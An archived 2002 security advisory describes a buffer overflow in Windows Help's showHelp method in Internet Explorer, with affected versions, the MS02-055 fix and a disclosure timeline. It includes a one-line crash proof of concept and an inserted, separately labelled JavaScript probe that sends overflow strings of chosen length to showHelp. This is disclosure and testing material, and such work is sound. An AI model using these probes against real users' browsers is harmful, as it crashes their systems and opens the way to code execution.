Thor Larholm security advisory TL#004

From: Thor Larholm (thorat_private)
Date: Wed Oct 09 2002 - 11:35:45 PDT


    Thor Larholm security advisory TL#004
    
    Topic: Windows Help buffer overflow
    
    HTML version:
    http://www.pivx.com/larholm/adv/TL004/
    
    Discovery date: 31 July 2002
    
    Release date: 4 October 2002
    
    Affected applications
    
    Microsoft Windows 98
    Microsoft Windows 98 Second Edition
    Microsoft Windows Millennium Edition
    Microsoft Windows NT 4.0
    Microsoft Windows NT 4.0, Terminal Server Edition
    Microsoft Windows 2000
    Microsoft Windows XP
    
    Severity: High
    
    Impact:
    Arbitrary code execution, taking any action the user has privileges to
    perform on the system.
    
    Introduction
    The Windows Help facility is exposed both as an ActiveX component and, through
    the showHelp method, as part of Internet Explorer. showHelp takes a URI as its
    argument and copies it into a fixed-size buffer, which is easily overflowed from
    a web page or from within an HTML email.
    
    Discussion:
    The size of the fixed buffer varies between Windows versions, most likely
    because it depends on a system-specific type size. This is not a mitigating
    factor in itself: for any given version the size is constant, and the overflow
    is a traditional one. It is our belief that this overflow must already be
    well known in the wild, as simple real-life uses of the showHelp method (with
    a moderately long URI) would easily expose the existence of this
    vulnerability.
    
    Due to this belief, we feel that it will benefit and empower end users more
    if they are able to easily verify for themselves whether they are using a
    vulnerable version of Windows Help. Others have recently made the public
    aware of this vulnerability as well, though without disclosing any actual
    details.
    
    Exploit:
    
    <!-- 796 "A" characters; Array.join is used because the IE versions of the era lack String.repeat -->
    <script>showHelp(new Array(797).join("A"));</script>
    
    Solution:
    Apply the MS02-055 patch.
    
    Demonstration:
    I have put together some proof-of-concept examples. These do not run any
    meaningful code but merely overflow the buffer with a lot of A characters.
    
    Simple, one-click test case
    http://www.pivx.com/larholm/adv/TL004/simple.html
    Try your own numbers
    http://www.pivx.com/larholm/adv/TL004/number.html
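    The following is an added example of a "try your own numbers" probe for the
    showHelp overflow described above; it is not the advisory's own test page and
    not code from PivX. It assumes a hypothetical probe.html that loads the script
    and takes the length from a query string such as ?len=800 (that parameter name
    is an assumption). Only the final showHelp call needs Internet Explorer; the
    parsing and payload construction run anywhere, and a stub can be passed in place
    of showHelp so the logic can be exercised outside the browser. Since the buffer
    size differs per Windows version, the length is the one knob a tester varies.

```javascript
// Added example (not the advisory's own test page): a "try your own numbers"
// probe for the showHelp() overflow.  The overflow length is read from the
// page's query string (?len=796, a hypothetical parameter name), a payload of
// that many "A" characters is built, and showHelp() is called with it.

// Parse "len" from a query string such as "?len=796".  Defaults to 796, the
// length used in the advisory's one-click test case, and rejects non-numeric
// or non-positive values.
function parseLength(search, fallback) {
  var def = (fallback === undefined) ? 796 : fallback;
  var m = /[?&]len=(\d+)(?:&|$)/.exec(search || "");
  if (!m) return def;
  var n = parseInt(m[1], 10);
  return n > 0 ? n : def;
}

// Build a string of exactly `length` copies of `fill` (default "A").
// Array.join is used instead of String.prototype.repeat, which the Internet
// Explorer versions affected by MS02-055 do not have.
function buildPayload(length, fill) {
  var ch = fill || "A";
  return new Array(length + 1).join(ch);
}

// Call showHelp with a payload of the given length and return that length.
// `helpFn` lets a stub be injected outside the browser; in IE, omit it and the
// page's own showHelp (the vulnerable entry point) is used.
function probeShowHelp(length, helpFn) {
  var fn = helpFn;
  if (!fn) {
    if (typeof showHelp !== "function") {
      throw new Error("showHelp() is only available inside Internet Explorer");
    }
    fn = showHelp;
  }
  var payload = buildPayload(length);
  fn(payload);
  return payload.length;
}

// In a browser: <script src="probe.js"></script> on a page opened as
// probe.html?len=800 (hypothetical file name).  A vulnerable Windows Help
// crashes once the length passes that version's buffer size; a patched one
// simply opens Help or ignores the bad URI.
if (typeof window !== "undefined" && typeof showHelp === "function") {
  probeShowHelp(parseLength(window.location.search));
}
```

    Because a successful overflow kills the browser, the threshold for a given
    Windows version is found by reloading the page with increasing ?len values
    rather than by looping inside the script.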
    
    Vendor status:
    Microsoft was notified on 31 July 2002 and released MS02-055 on 2 October
    2002.
    
    
    
    Regards
    Thor Larholm, Security Researcher
    PivX Solutions, LLC
    
    Are You Secure?
    http://www.PivX.com
    



    This archive was generated by hypermail 2b30 : Wed Oct 09 2002 - 13:15:16 PDT